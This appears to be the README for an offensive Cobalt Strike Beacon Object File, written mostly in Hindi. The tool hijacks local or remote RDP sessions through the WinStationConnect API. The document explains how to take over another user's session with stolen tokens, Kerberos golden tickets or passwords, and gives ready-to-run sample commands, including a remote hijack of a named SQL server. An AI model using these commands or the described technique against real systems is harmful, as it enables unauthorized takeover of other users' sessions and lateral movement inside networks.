
Cobalt Strike Beacon Object File (BOF) जो WinStationConnect API का उपयोग करके स्थानीय/दूरस्थ RDP सत्र अपहरण करता है।
कोबाल्ट स्ट्राइक बीकन ऑब्जेक्ट फ़ाइल (BOF) जो स्थानीय/रिमोट RDP सत्र अपहरण करने के लिए WinStationConnect API का उपयोग करती है। सत्र स्वामी के मान्य एक्सेस टोकन/केर्बरोस टिकट (जैसे, गोल्डन टिकट) के साथ, आप लक्ष्य सर्वर पर कोई बीकन/टूल ड्रॉप किए बिना रिमोट रूप से सत्र का अपहरण करने में सक्षम होंगे।
स्थानीय/रिमोट रूप से सत्रों की गणना करने के लिए, आप Quser-BOF का उपयोग कर सकते हैं।

Usage: bof-rdphijack [your console session id] [target session id to hijack] [password|server] [argument]
Command Description
-------- -----------
password Specifies the password of the user who owns the session to which you want to connect.
server Specifies the remote server that you want to perform RDP hijacking.
Sample usage
--------
Redirect session 2 to session 1 (require SYSTEM privilege):
bof-rdphijack 1 2
Redirect session 2 to session 1 with password of the user who owns the session 2 (require high integrity beacon):
bof-rdphijack 1 2 password P@ssw0rd123
Redirect session 2 to session 1 for a remote server (require token/ticket of the user who owns the session 2):
bof-rdphijack 1 2 server SQL01.lab.internal
make
tscon.exe